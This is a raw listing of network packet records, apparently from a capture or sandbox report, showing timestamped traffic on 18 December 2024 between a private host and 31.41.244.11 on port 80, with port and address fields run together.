                                                                                                                                                              Dec 18, 2024 11:47:16.756933928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.756975889 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.756988049 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.757915974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.757963896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.758399963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.759193897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.759253025 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.759861946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.760188103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.760370016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.760382891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.760418892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.761652946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.761709929 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.762072086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.762121916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.762572050 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.762671947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.762710094 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.762756109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.763866901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.763917923 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.764220953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.764273882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.764983892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.765086889 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.765166044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.765336037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.766128063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.766139984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.766181946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.766192913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.767692089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.767745018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.768055916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.769128084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.769140959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.769176006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.769202948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.769871950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.769882917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.769932032 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.771234989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.771246910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.771290064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.772130966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.772183895 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.772305965 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.772449017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.773268938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.773283958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.773329973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.773329973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.774290085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.774331093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.774601936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.774640083 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.775527000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.775568962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.775691986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.776784897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.776830912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.776952982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.777179956 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.906656027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.906742096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.906851053 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.907274961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.907393932 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.907443047 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.908390045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.908442020 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.908503056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.909687042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.909744978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.909985065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.910104036 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.910151005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.911236048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.911348104 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.911396980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.912403107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.912590981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.912641048 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.913479090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.913530111 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.913587093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.914630890 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.914678097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.914757967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.915882111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.915940046 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.916001081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.916043997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.916963100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.917177916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.917227983 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.918127060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.918235064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.918299913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.919421911 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.919477940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.919625044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.920243025 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.920607090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.920645952 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.920747042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.920787096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.921633959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.921751976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.921802998 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.922825098 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.922996044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.923046112 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.924046993 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.924088001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.924144030 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.924295902 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.925237894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.925281048 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.925311089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.925348043 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.926415920 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.926614046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.926660061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.927506924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.927567005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.927609921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.928769112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.928893089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.928937912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.929842949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.929886103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.929944038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.931016922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.931067944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.931134939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.932209969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.932260990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.932404041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.933507919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.933562040 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.933564901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.933608055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.934530973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.934623003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.934686899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.935710907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.935893059 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.935951948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.936923981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.936990976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.937036037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.938159943 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.938215971 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.938271046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.939229965 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.939273119 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.939380884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.940275908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.940373898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.940479994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.940526962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.941554070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.941772938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.941822052 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.942748070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.942792892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.942851067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.943975925 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.944016933 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.944042921 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.944554090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.945053101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.945153952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.945221901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.946265936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.946304083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.946319103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.946336031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.947452068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.947501898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.947550058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.947588921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.948628902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.948683023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.948779106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.948826075 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.949922085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.949966908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.950002909 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.950305939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.951008081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.951054096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.951200008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.951244116 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.952095032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.952137947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.952344894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.952383041 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.953318119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.953360081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.953424931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.953461885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.954530954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.954572916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.954591036 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.954629898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.955578089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.955621958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.955755949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.955802917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.956835985 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.956887007 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.956948042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.956989050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.957967043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.958015919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.958152056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.958209991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.959151983 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.959193945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.959275961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.959321976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.960470915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.960524082 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.960690975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.960735083 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.961466074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.961527109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.961581945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.962768078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.962821960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.962882042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.962930918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.963816881 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.963867903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.963908911 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.964013100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.965058088 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.965101004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.965243101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.965311050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.966173887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.966222048 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.966284990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.966331959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.967329979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.967372894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.967417002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.967417002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.107400894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.107456923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.107467890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.107496977 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.107589960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.107630968 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.107696056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.107733965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.108783007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.108805895 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.108824968 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.108838081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.109941006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.109961987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.109980106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.109996080 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.110814095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.110855103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.110997915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.111036062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.111991882 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.112032890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.112173080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.112211943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.113262892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.113301992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.113311052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.113346100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.114320040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.114358902 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.114414930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.114451885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.115529060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.115573883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.115647078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.115684986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.116717100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.116755009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.116813898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.116852045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.117837906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.117918968 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.117989063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.119016886 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.119096994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.119155884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.120174885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.120255947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.120294094 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.120342970 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.121330976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.121368885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.121428013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.121465921 CET4980680192.168.2.631.41.244.11
